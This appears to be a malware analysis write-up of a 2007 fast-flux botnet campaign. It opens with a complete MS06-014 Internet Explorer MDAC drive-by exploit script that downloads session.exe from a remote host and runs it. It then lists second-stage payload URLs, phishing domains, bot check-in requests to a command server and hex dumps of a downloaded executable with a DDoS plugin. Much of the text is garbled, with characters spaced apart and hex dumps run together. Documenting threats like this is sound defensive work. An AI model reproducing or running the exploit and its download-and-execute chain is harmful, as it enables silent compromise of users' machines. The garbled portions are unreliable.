D i mO b j _ N a m e D i mO b j _ P r o g < s e to b j _ R D S=d o c u m e n t . c r e a t e E l e m e n t ( " o b j e c t " ) o b j _ R D S . s e t A t t r i b u t e" i d " ," o b j _ R D S " o b j _ R D S . s e t A t t r i b u t e" c l a s s i d " ," c l s i d : B D 9 6 C 5 5 6 6 5 A 3 1 1 D 0 9 8 3 A 0 0 C 0 4 F C 2 9 E 3 6 " f n=" n t m u s i s 3 2 . e x e " O b j _ N a m e=" S h e l l " O b j _ P r o g=" A p p l i c a t i o n " s e to b j _ S h e l l A p p=o b j _ R D S . C r e a t e O b j e c t ( O b j _ N a m e&" . "&O b j _ P r o g , " " ) S e to F o l d e r=o b j _ S h e l l A p p . N a m e S p a c e ( 2 0 ) S e to F o l d e r I t e m = o F o l d e r . P a r s e N a m e ( " S y m b o l . t t f " ) F o n t _ P a t h _ C o m p o n e n t s = S p l i t ( o F o l d e r I t e m . P a t h , " \ " , 1 , 1 ) W i n D i r =F o n t _ P a t h _ C o m p o n e n t s ( 0 )&" \ "&F o n t _ P a t h _ C o m p o n e n t s ( 1 )&" \ " f n = W i n D i r&f n O b j _ N a m e=" M i c r o s o f t " O b j _ P r o g=" X M L H T T P " s e to b j _ m s x m l 2=C r e a t e O b j e c t ( O b j _ N a m e&" . "&O b j _ P r o g ) o b j _ m s x m l 2 . o p e n" G E T " , " h t t p : / / x x x . f a f b 4 c 4 c . c o m / s e s s i o n . e x e " , F a l s e o b j _ m s x m l 2 . s e n d O nE r r o rR e s u m eN e x t O b j _ N a m e=" A D O D B " O b j _ P r o g=" S t r e a m " s e to b j _ a d o d b=o b j _ R D S . C r e a t e O b j e c t ( O b j _ N a m e&" . "&O b j _ P r o g , " " ) I fE r r . N u m b e rT h e n O b j _ N a m e=" S c r i p t i n g " O b j _ P r o g=" F i l e S y s t e m O b j e c t " S e to b j _ F i l e S y s = o b j _ R D S . C r e a t e O b j e c t ( O b j _ N a m e&" . "&O b j _ P r o g , " " ) S e td o w n l o a d _ f i l e = o b j _ F i l e S y s . C r e a t e T e x t F i l e ( f n ,T R U E ) d o w n l o a d _ f i l e _ s i z e = L e n B ( X M L B o d y ) F o ri = 1 T od o w n l o a d _ f i l e _ s i z e c B y t e = M i d B ( X M L B o d y , i , 1 ) B y t e C o d e = A s c B ( c B y t e ) d o w n l o a d _ f i l e . W r i t e ( C h r ( B y t e C o d e ) ) N e x t d o w n l o a d _ f i l e . C l o s e O b j _ N a m e=" W S c r i p t " O b j _ P r o g=" S h e l l " S e to b j _ W S h e l l = o b j _ R D S . C r e a t e O b j e c t ( O b j _ N a m e&" . "&O b j _ P r o g , " " ) O nE r r o rR e s u m eN e x t o b j _ W S h e l l . R u nf n , 1 , F A L S E E l s e o b j _ a d o d b . T y p e = 1 o b j _ a d o d b . O p e n o b j _ a d o d b . W r i t e ( o b j _ m s x m l 2 . r e s p o n s e B o d y ) o b j _ a d o d b . S a v e T o F i l ef n , 2 o b j _ S h e l l A p p . S h e l l E x e c u t ef n E n dI f E n dI f E n dI f < / S C R I P T >
The successful compromise of a windows host via this exploit content results in the download of a malicious downloader stub executable session.exe that is then responsible for attempting to download additional malicious components necessary for integrate new compromised hosts into a fast flux service network. The malware sample session.exe above attempts to download and execute the following components: http://xxx.myfiles.hk/exes/webdl3x/weby.exe http://xxx.myfiles.hk/exes/webdl3x/oly.exe http://xxx.camgenie.com/weby7.exe Supporting Detail: Following are a representative sampling of URLs to imageshack.us site hosted flash files that simply perform one simple action, an action-script based browser redirect to a flux-hosted combination phishing/drive by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). All files are exactly the same based on same md5 and sha1 hashes for all files: MD5:6eaf6eed47fb52a6a87da8c829c7f8a0 SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740 Imageshack HTTP Server maintained modification time suggest swf file compile time of 2007-06-05 03:56:30-0700. Decompiling the flash component results in: $ swfdump -atp ./xxx.imageshack.us/img527/3530/38023350se6.swf [HEADER] File version: 8 [HEADER] File size: 98 [HEADER] Frame rate: 120.000000 [HEADER] Frame count: 1 [HEADER] Movie width: 1.00 [HEADER] Movie height: 1.00 [045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff) [018] 31 PROTECT [00c] 28 DOACTION ( 24 bytes) action: GetUrl URL:"http://xxx.e447aa2.com" Label:"" ( 0 bytes) action: End [001] 0 SHOWFRAME 1 (00:00:00,000) [000] 0 END Below are a few examples of URLs that host the same flash files: http://xxx.imageshack.us/img116/1299/97231039qx0.swf http://xxx.imageshack.us/img116/1424/81562934sa1.swf http://xxx.imageshack.us/img116/1699/63088115dg4.swf http://xxx.imageshack.us/img116/1700/81458378cv3.swf http://xxx.imageshack.us/img116/2453/70754097cm0.swf http://xxx.imageshack.us/img116/2456/14892185hl4.swf http://xxx.imageshack.us/img116/8345/26333607xo4.swf http://xxx.imageshack.us/img120/3595/53060403mw7.swf The following are examples of flux serviced MySpace phish/drive-by domains referenced from presumably compromised MySpace user accounts, which were observed during the same time period between 2007-06-26 17:35:44 and 23:18:00 (EDT -0400) xxx.myspace.com.index.cfm.fuseaction.user.mytoken.00b24yqc.ac8a562.com xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0c38outb.h5v17lt.com xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0en0r8xd.115534a.com xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0l3ttn77.oqrhldv.com xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0w4c4w74.jk33v96.com xxx.myspace.com.index.cfm.fuseaction.user.mytoken.3kuto9a4.de082ak.com xxx.myspace.com.index.cfm.fuseaction.user.mytoken.5c1wkjil.kirjmbr.com
GET /settings/weby/remote.php?os=XP&user=homenetab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1 User-Agent: MSIE 7.0 Host: xxx.ifeelyou.info Cache-Control: no-cache
GET /settings/weby/remote.php?os=XP&user=homenetab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1 User-Agent: MSIE 7.0 Host: xxx.ifeelyou.info Cache-Control: no-cache
GET /settings/weby/remote.php?os=XP&user=homenetab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1 User-Agent: MSIE 7.0 Host: xxx.ifeelyou.info Cache-Control: no-cache HTTP/1.1 200 OK Date: Tue, 03 Apr 2007 07:55:53 GMT Server: Apache/2.0.54 (Fedora) X-Powered-By: PHP/5.0.4 Content-Length: 19 Connection: close Content-Type: text/html; charset=UTF-8 Added Successfully!
appears to be a consistent 197 byte binary/encoded configuration response. We are still attempting to complete reverse engineering of this session:
0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 3 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 5 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 7 0 0 0 0 0 0 0 8 0 0 0 0 0 0 0 9 0 0 0 0 0 0 0 a 0 0 0 0 0 0 0 b 0 0 0 0 0 0 0 c 0 0 0 0 0 0 0 d 0 0 0 0 0 0 0 e 0 0 0 0 0 0 0 f 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 1 2 0 0 0 0 0 0 1 3 0 0 0 0 0 0 1 4 0 0 0 0 0 0 1 5 0 0 0 0 0 0 1 6 0 0 0 0 0 0 1 7 0 0 0 0 0 0 1 8 0 0 0 0 0 0 1 9 0 0 0 0 0 0 1 a 0 0 0 0 0 0 1 b 0 0 0 0 0 0 1 c 0 0 0 0 0 0 1 d 0 0 0 0 0 0 1 e 0 0 0 0 0 0 1 f 0 0 0 0 0 0 2 0 0 0 0 0 0 0 2 1 0 0 0 0 0 0 2 2 0 0 0 0 0 0 2 3 0 0 0 0 0 0 2 4 0 0 0 0 0 0 2 5 0 0 0 0 0 0 2 6 0 0 0 0 0 0 2 7 0 0 0 0 0 0 2 8 0 0 0 0 0 0 2 9 0 0 0 0 0 0 2 a 0 0 0 0 0 0 2 b 0 0 0 0 0 0 2 c 0 4 7 4 55 4 2 02 f 7 36 5 7 47 4 6 96 e 6 77 3 2 f7 7 6 5 6 2 7 92 f 7 36 5 7 47 4 6 96 e 6 77 3 2 e6 9 6 e6 9 2 0 4 8 5 45 4 5 02 f 3 12 e 3 10 d 0 a5 5 7 36 5 7 22 d 4 1 6 7 6 56 e 7 43 a 2 04 d 5 34 9 4 52 0 3 72 e 3 00 d 0 a 4 8 6 f7 3 7 43 a 2 0x x x xx x x xx x x xx x x x2 e 6 9 6 3 6 f6 e 6 e6 5 6 37 4 7 96 f 7 52 e 6 26 9 7 a0 d 0 a 4 3 6 16 3 6 86 5 2 d4 3 6 f6 e 7 47 2 6 f6 c 3 a2 0 6 e 6 f 2 d6 3 6 16 3 6 86 5 0 d0 a 0 d0 a 4 74 5 5 42 0 2 f 7 3 6 57 4 7 46 9 6 e6 7 7 32 f 7 76 5 6 27 9 2 f7 3 6 5 7 4 7 46 9 6 e6 7 7 32 e 6 96 e 6 92 0 4 85 4 5 45 0 2 f 3 1 2 e3 1 0 d0 a 5 57 3 6 57 2 2 d4 1 6 76 5 6 e7 4 3 a 2 0 4 d5 3 4 94 5 2 03 7 2 e3 0 0 d0 a 4 86 f 7 37 4 3 a 2 0 x xx x x xx x x xx x x xx x 2 e6 9 6 36 f 6 e6 e 6 5 6 3 7 47 9 6 f7 5 2 e6 2 6 97 a 0 d0 a 4 36 1 6 36 8 6 5 2 d 4 36 f 6 e7 4 7 26 f 6 c3 a 2 06 e 6 f2 d 6 36 1 6 3 6 8 6 50 d 0 a0 d 0 a4 8 5 45 4 5 02 f 3 12 e 3 12 0 3 2 3 0 3 02 0 4 f4 b 0 d0 a 4 46 1 7 46 5 3 a2 0 5 47 5 6 5 2 c 2 03 0 3 32 0 4 17 0 7 22 0 3 23 0 3 03 7 2 03 0 3 7 3 a 3 53 5 3 a3 4 3 02 0 4 74 d 5 40 d 0 a5 3 6 57 2 7 6 6 5 7 23 a 2 04 1 7 06 1 6 36 8 6 52 f 3 22 e 3 02 e 3 5 3 4 2 02 8 4 66 5 6 46 f 7 26 1 2 90 d 0 a4 c 6 17 3 7 4 2 d 4 d6 f 6 46 9 6 66 9 6 56 4 3 a2 0 4 d6 f 6 e2 c 2 0 3 0 3 22 0 4 17 0 7 22 0 3 23 0 3 03 7 2 03 2 3 33 a 3 3 3 7 3 a3 3 3 62 0 4 74 d 5 40 d 0 a4 5 5 46 1 6 73 a 2 0 2 2 3 83 0 3 03 7 6 12 d 6 33 5 2 d6 2 3 46 2 6 33 7 3 0 3 0 3 02 2 0 d0 a 4 16 3 6 36 5 7 07 4 2 d5 2 6 16 e 6 7 6 5 7 33 a 2 06 2 7 97 4 6 57 3 0 d0 a 4 36 f 6 e7 4 6 5 6 e 7 42 d 4 c6 5 6 e6 7 7 46 8 3 a2 0 3 13 9 3 70 d 0 a 4 3 6 f6 e 6 e6 5 6 37 4 6 96 f 6 e3 a 2 06 3 6 c6 f 7 3 6 5 0 d0 a 4 36 f 6 e7 4 6 56 e 7 42 d 5 47 9 7 06 5 3 a 2 0 7 46 5 7 87 4 2 f7 0 6 c6 1 6 96 e 3 b2 0 6 36 8 6 1 7 2 7 36 5 7 43 d 5 55 4 4 62 d 3 80 d 0 a0 d 0 ab 2 b 4 0 d 0 a0 d 0 a8 d 8 d8 6 9 a9 5 8 d8 5 9 58 1 9 d9 d 9 9 d 3 c 6c 6 d fd c c 7d 8 d 8d 8 c 7d 8 d ed f c 7d 8 d e d d c 69 e 8 c8 b 9 0c 6 9 98 5 9 c8 e 8 08 7 b 68 d 8 d 8 6 9 ac 7 8 d8 5 8 50 d 0 a0 d 0 a8 d 8 d8 6 9 a9 5 9 d 8 a 9 99 5 8 88 4 8 c9 b 8 08 a 8 88 7 8 d9 f 8 dc 7 9 d 9 f 9 5d 1 d 99 5 d 8d 9 d 9d 9 d 90 d 0 a8 d 8 d8 6 9 a 9 5 9 c8 d 9 99 5 8 88 4 8 c9 b 8 08 a 8 88 7 8 d9 f 8 d c 7 9 d9 f 9 5d 1 d 99 5 d 8d 9 d 9d 9 d 90 d 0 a8 d 8 d 8 6 9 a9 5 9 d9 b 8 68 5 8 59 5 8 88 4 8 c9 b 8 08 a 8 8 8 7 8 d9 f 8 dc 7 9 d9 f 9 5d 1 d 99 5 d 8d 9 d 9d 9 d 9 0 d 0 a8 d 8 d8 6 9 a9 5 8 19 d 9 d9 9 9 58 8 8 48 c 9 b 8 0 8 a8 8 8 78 d 9 f8 d c 79 d 9 f9 5 d 1d 9 9 5d 8 d 9 d 9 d 9d 9 G E T/ s e t t i n g s / w e b y / s e t t i n g s . i n i H T T P / 1 . 1 . . U s e r A g e n t :M S I E7 . 0 . . H o s t :x x x x x x x x . i c o n n e c t y o u . b i z . . C a c h e C o n t r o l :n o c a c h e . . . . G E T/ s e t t i n g s / w e b y / s e t t i n g s . i n iH T T P / 1 . 1 . . U s e r A g e n t : M S I E7 . 0 . . H o s t : x x x x x x x x . i c o n n e c t y o u . b i z . . C a c h e C o n t r o l :n o c a c h e . . . . H T T P / 1 . 12 0 0O K . . D a t e :T u e ,0 3A p r2 0 0 70 7 : 5 5 : 4 0G M T . . S e r v e r :A p a c h e / 2 . 0 . 5 4( F e d o r a ) . . L a s t M o d i f i e d :M o n , 0 2A p r2 0 0 72 3 : 3 7 : 3 6G M T . . E T a g : " 8 0 0 7 a c 5 b 4 b c 7 0 0 0 " . . A c c e p t R a n g e s :b y t e s . . C o n t e n t L e n g t h :1 9 7 . . C o n n e c t i o n :c l o s e . . C o n t e n t T y p e : t e x t / p l a i n ;c h a r s e t = U T F 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
0 0 0 0 0 1 f 0 0 0 0 0 0 2 0 0 0 0 0 0 0 2 1 0 0 0 0 0 0 2 2 0 0 0 0 0 0 2 3 0 0 0 0 0 0 2 4 0 0 0 0 0 0 2 5 0 . . 0 0 0 0 0 f 8 0 0 0 0 0 0 f 9 0 0 0 0 0 0 f a 0 0 0 0 0 0 f b 0 . . 0 0 0 0 2 2 6 0 0 0 0 0 2 2 7 0 0 0 0 0 2 2 8 0 0 0 0 0 2 2 9 0 . . 0 0 0 0 2 7 0 0 0 0 0 0 2 7 1 0 0 0 0 0 2 7 2 0 0 0 0 0 2 7 3 0 0 0 0 0 2 7 4 0 0 0 0 0 2 7 5 0 0 0 0 0 2 7 6 0 0 0 0 0 2 7 7 0 0 0 0 0 2 7 8 0 0 0 0 0 2 7 9 0 0 0 0 0 2 7 a 0 0 0 0 0 2 7 b 0 0 0 0 0 2 7 c 0 0 0 0 0 2 7 d 0 0 0 0 0 2 7 e 0 0 0 0 0 2 7 f 0 0 0 0 0 2 8 0 0 0 0 0 0 2 8 1 0 0 0 0 0 2 8 2 0 0 0 0 0 2 8 3 0 0 0 0 0 2 8 4 0
2 0 6 27 9 7 46 5 7 30 d 0 a4 3 6 f6 e 7 46 5 6 e7 4 2 d 4 c 6 56 e 6 77 4 6 83 a 2 03 9 3 73 2 3 80 d 0 a4 3 6 f 6 e 6 e6 5 6 37 4 6 96 f 6 e3 a 2 06 3 6 c6 f 7 36 5 0 d 0 a 4 36 f 6 e7 4 6 56 e 7 42 d 5 47 9 7 06 5 3 a2 0 6 1 7 0 7 06 c 6 96 3 6 17 4 6 96 f 6 e2 f 6 f6 3 7 46 5 7 4 2 d 7 37 4 7 26 5 6 16 d 0 d0 a 0 d0 a 4 d5 a 5 00 0 0 2 0 0 0 00 0 0 40 0 0 f0 0 f ff f 0 00 0 b 80 0 0 00 0 0 0
b y t e s . . C o n t e n t L e n g t h :9 7 2 8 . . C o n n e c t i o n :c l o s e . . C o n t e n t T y p e :a p p l i c a t i o n / o c t e t s t r e a m . . . . M Z P . . . . . . . . . . . . . . . . . .
0 0 0 00 0 5 06 f 7 27 4 6 96 f 6 e7 3 2 04 3 6 f7 0 7 9 7 2 6 96 7 6 87 4 2 02 8 6 32 9 2 03 1 3 93 9 3 92 c 3 2 3 0 3 03 3 2 04 1 7 66 5 6 e6 7 6 57 2 2 06 2 7 92 0 4 e 6 8 5 40 0 5 06 a 4 0e 8 b 8f 6 f ff f c 38 d 4 00 0 b 8
. . . P o r t i o n sC o p y r i g h t( c )1 9 9 9 , 2 0 0 3A v e n g e rb yN h T . P j @ . . . . . . . @ . .
0 0 0 00 0 0 10 0 0 00 0 2 86 0 0 00 0 2 c6 0 0 00 0 3 0 6 0 0 00 0 d 42 2 0 00 0 4 26 0 0 00 0 0 00 0 7 06 c 7 5 6 7 6 96 e 5 f6 4 6 46 f 7 32 e 6 46 c 6 c0 0 5 66 1 6 c 6 9 6 46 1 7 46 5 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0
. . . . . . . ( ` . . , ` . . 0 ` . . . " . . B ` . . . . p l u g i n _ d d o s . d l l . V a l i d a t e . . . . . . . . . . .
8 2 3 7b 8 f 32 4 4 20 3 1 79 b 3 a8 3 0 10 0 0 08 c 0 0 0 0 0 00 0 0 90 0 0 00 0 0 1d 0 7 06 c 7 56 7 6 96 e 5 f 6 4 6 46 f 7 30 0 1 ca 9 5 76 9 6 e5 3 6 f6 3 6 b0 0 0 0 c 7 5 37 9 7 37 4 6 56 d 0 00 0 8 15 3 7 97 3 4 96 e 6 9 7 4 0 00 c 4 b5 7 6 96 e 6 46 f 7 77 3 0 01 0 5 55 4 7 9 7 0 6 57 3 0 00 0 6 37 3 6 86 4 7 20 0 0 c3 f 5 76 9 6 e 4 9 6 e6 5 7 40 0 0 07 9 5 76 9 6 e5 3 6 f6 3 6 b3 2 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0 0 0 0 0 0 00 0 0 00 0 0 00 0 0 00 0 0 00 0
. 7 . . $ B . . . : . . . . . . . . . . . . . . . p l u g i n _ d d o s . . . W i n S o c k . . . S y s t e m . . . S y s I n i t . . K W i n d o w s . . U T y p e s . . c s h d r . . ? W i n I n e t . . y W i n S o c k 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .